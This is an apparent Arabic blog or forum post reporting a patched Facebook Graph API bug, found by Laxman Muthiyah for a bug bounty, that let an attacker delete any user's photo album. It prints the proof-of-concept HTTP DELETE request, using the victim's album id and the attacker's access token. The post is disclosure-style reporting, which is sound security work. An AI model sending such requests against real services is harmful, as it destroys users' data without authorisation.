ثغرة في الفيس بوك تسمح للهاكر بحذف البوم صور المستخدم
السلام عليكم
تمكن احد الهاكرز من اكتشاف ثغرة تمكن الهاكر من حذف اي البوم صور من الفيس بوك من دون صلاحيات
ويدعى Laxman Muthiyah ولقد استلم مكافئة من الفيس بوك 12 الف دولار لمساعدة فريق الفيس بوك لترقيع الثغرة
اكتشف الثغرة ف Graph API والي تتطلب access token
مثال كيف يتم استغلال الثغرة عبر ارسال استعلام
Request :-
DELETE /<Victim’s_photo_album_id> HTTP/1.1
Host : graph.facebook.com
Content-Length: 245
access_token=<Your(Attacker)_Facebook_for_Android_Access_Token>
يمكنكم مشاهدة الفيديو
https://www.youtube.com/watch?v=93EdTtVJKBU
اطيب الامنيات
إرسال التعليق